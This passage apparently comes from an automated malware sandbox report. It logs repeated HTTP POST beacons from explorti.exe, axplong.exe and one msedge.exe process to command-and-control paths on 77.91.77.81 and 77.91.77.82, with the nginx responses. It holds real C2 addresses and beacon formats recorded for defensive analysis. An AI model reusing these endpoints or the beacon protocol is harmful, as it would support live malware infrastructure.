                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:06.670005083 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        107192.168.2.64994977.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:06.120632887 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:06.859898090 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:06.863661051 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:07.091176987 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        108192.168.2.64995077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:06.680188894 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:07.395531893 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        109192.168.2.64995177.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:07.225075960 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:07.958980083 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        110192.168.2.64995277.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:07.515968084 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:08.235321999 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:08 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        111192.168.2.64995377.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:07.968856096 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:08.716367006 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:08 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        112192.168.2.64995477.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:08.254100084 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:08.958178997 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:08 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        113192.168.2.64995577.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:08.840770006 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:09.555774927 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        114192.168.2.64995677.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:09.083154917 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:09.807940006 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        115192.168.2.64995777.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:09.566040993 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:10.270504951 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        116192.168.2.64995877.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:09.824851990 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:10.565381050 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        117192.168.2.64995977.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:10.385854959 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:11.114228964 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:11.119822025 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:11.350511074 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:11 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        118192.168.2.64996077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:10.685606003 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:11.431483984 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:11 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        119192.168.2.64996177.91.77.81802832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:11.450510979 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:12.175760031 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        120192.168.2.64996277.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:11.469758034 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:12.178227901 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        121192.168.2.64996377.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:12.216835022 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:12.963442087 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        122192.168.2.64996477.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:12.293402910 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:13.000029087 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        123192.168.2.64996577.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:13.011552095 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:14.118541002 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        124192.168.2.64996677.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:13.078058958 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:13.805978060 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
